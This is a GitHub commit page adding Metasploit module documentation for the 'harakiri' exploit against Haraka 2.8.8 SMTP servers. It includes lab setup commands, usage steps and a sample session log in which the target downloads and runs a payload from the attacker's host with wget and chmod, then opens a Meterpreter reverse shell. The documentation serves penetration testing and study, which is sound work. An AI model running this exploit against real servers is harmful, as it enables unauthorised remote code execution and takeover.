adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create harakiri.md

Browse Source
This commit is contained in:
Mark Bergman (aka xychix)
2017-01-27 10:31:12 +01:00
committed by GitHub
parent 410e2629bb
commit 651f1a0870
1 changed files with 127 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/smtp/harakiri.md
+127
View File
@@ -0,0 +1,127 @@
## Vulnerable Application
You can get the vulnerable Haraka installes by running this script:
````
#Install a clean server (for example on Digital Ocean)
#I picked the smallest Ubuntu 16.04.1 LTS for this guide.
#I needed to enable swap on that installation
fallocate -l 4G /swapfile
chmod 600 /swapfile
mkswap /swapfile
swapon /swapfile
swapon -s
#install nodejs and npm: Note I have no clue what I'm doing here but it works!
apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
tar xvzf v2.8.8.tar.gz
cd Haraka-2.8.8/
npm install -g npm
ln -s /usr/bin/nodejs /usr/bin/node
npm install -g
#Haraka setup
haraka -i /root/haraka
cat << EOF > /root/haraka/config/plugins
access
rcpt_to.in_host_list
data.headers
attachment
test_queue
max_unrecognized_commands
EOF
cat << EOF >> /root/haraka/config/host_list
haraka.test
EOF
# Launch haraka as root
haraka -c /root/haraka/
````
## Verification Steps
Example steps in this format:
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/linux/smtp/harakiri```
4. Do: ```set RHOST <rhost>```
5. Do: ```expoit```
6. You should get a shell. If not play with MAILFROM MAILTO options.
## Options
**EHLO**
String used in the SMTP EHLO command
**MAILTO**
String used in the SMTP MAILTO command
**MAILFROM**
String used in the SMTP FROM command
**DOWNHOST**
Download server for payload (if empty SRVHOST will be used)
**DOWNFILE**
File to download from DOWNHOST (if empty a random name will be generated and used)
## Scenarios
Specific demo of using the module that might be useful in a real world scenario.
```
#msfconsole
=[ metasploit v4.13.15-dev ]
+ -- --=[ 1614 exploits - 915 auxiliary - 279 post ]
+ -- --=[ 471 payloads - 39 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/linux/smtp/harakiri
msf exploit(harakiri) > set RHOST 257.6.26.2
RHOST => 257.6.26.2
msf exploit(harakiri) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 6.6.6.6:4444
[*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ...
[*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw
[*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw
msf exploit(harakiri) > [*] 257.6.26.2:25 - /usr/bin/wget http://6.6.6.6:8080/fNdKlTRZAw -O /tmp/fNdKlTRZAw;chmod 777 /tmp/fNdKlTRZAw;/tmp/fNdKlTRZAw
[*] 257.6.26.2:25 - 257.6.26.2:25 - Server: 220 harakiri ESMTP Haraka 2.8.8 ready
[*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello burn.outflank.nl [6.6.6.6], Haraka is at your service.
[*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-PIPELINING
[*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-8BITMIME
[*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250 SIZE 0
[*] 257.6.26.2:25 - 257.6.26.2:25 - MAIL: 250 sender <harakiri@exploit.db> OK
[*] 257.6.26.2:25 - 257.6.26.2:25 - RCPT: 250 recipient <root@haraka.test> OK
[*] 257.6.26.2:25 - 257.6.26.2:25 - DATA: 354 go ahead, make my day
[*] 257.6.26.2:25 - 257.6.26.2:25 - Sending the payload to the server...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 257.6.26.2
[*] Meterpreter session 1 opened (6.6.6.6:4444 -> 257.6.26.2:51022) at 2017-01-26 16:15:04 +0100
msf exploit(harakiri) >
[*] 257.6.26.2:25 - Server stopped.
msf exploit(harakiri) >
```
For example:
To do this specific thing, here's how you do it:
```
msf > use exploit/linux/smtp/harakiri
msf exploit(harakiri) > set RHOST 257.6.26.2
RHOST => 257.6.26.2
msf exploit(harakiri) > exploit
```